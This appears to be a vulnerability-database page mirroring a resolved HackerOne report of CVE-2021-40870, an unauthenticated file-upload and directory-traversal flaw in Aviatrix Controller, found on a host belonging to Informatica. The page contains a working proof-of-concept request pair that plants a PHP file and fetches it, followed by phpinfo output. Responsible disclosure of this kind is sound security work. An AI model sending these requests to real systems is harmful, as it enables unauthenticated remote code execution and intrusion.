Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

CVE-2021-40870 in [███]

Critical
I
Informatica
Submitted None
Actions:
View on HackerOne
Reported by fdeleite

Vulnerability Details

Technical details and impact analysis

Code Injection
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. The IP has a SSL certificate pointing to Informatica LLC. ``curl -kvI https://█████████`` Output ``` Server certificate: * subject: ██████ ``` ## Steps To Reproduce First, run this request: ``` POST /v1/backend1 HTTP/1.1 Host: ████████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Connection: close Content-Length: 136 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?> ``` The retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php`` ``` GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1 Host: ████ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ``` Which is basically the output of the phpinfo function: Response (truncated): ``` <tr class="h"><th>Variable</th><th>Value</th></tr> <tr><td class="e">SCRIPT_URL </td><td class="v">/v1/1.php </td></tr> <tr><td class="e">SCRIPT_URI </td><td class="v">https://█████████/v1/1.php </td></tr> <tr><td class="e">HTTPS </td><td class="v">on </td></tr> <tr><td class="e">SSL_SERVER_S_DN_C </td><td class="v">US </td></tr> <tr><td class="e">SSL_SERVER_S_DN_ST </td><td class="v">California </td></tr> <tr><td class="e">SSL_SERVER_S_DN_L </td><td class="v">Redwood City </td></tr> <tr><td class="e">SSL_SERVER_S_DN_O </td><td class="v">Informatica LLC </td></tr> <tr><td class="e">SSL_SERVER_S_DN_OU </td><td class="v">██████ </td></tr> <tr><td class="e">SSL_SERVER_S_DN_CN </td><td class="v">██████ </td></tr> <tr><td class="e">SSL_SERVER_I_DN_C </td><td class="v">US </td></tr> <tr><td class="e">SSL_SERVER_I_DN_O </td><td class="v">HydrantID (Avalanche Cloud Corporation) </td></tr> <tr><td class="e">SSL_SERVER_I_DN_CN </td><td class="v">HydrantID SSL ICA G2 </td></tr> <tr><td class="e">SSL_SERVER_SAN_DNS_0 </td><td class="v">███ </td></tr> <tr><td class="e">SSL_VERSION_INTERFACE </td><td class="v">mod_ssl/2.4.39 </td></tr> ``` ## Impact - An unauthenticated, 3rd-party attacker or adversary can execute remote code ### Supporting Material/References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870

Related CVEs

Associated Common Vulnerabilities and Exposures

CVE-2021-40870 UNKNOWN

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection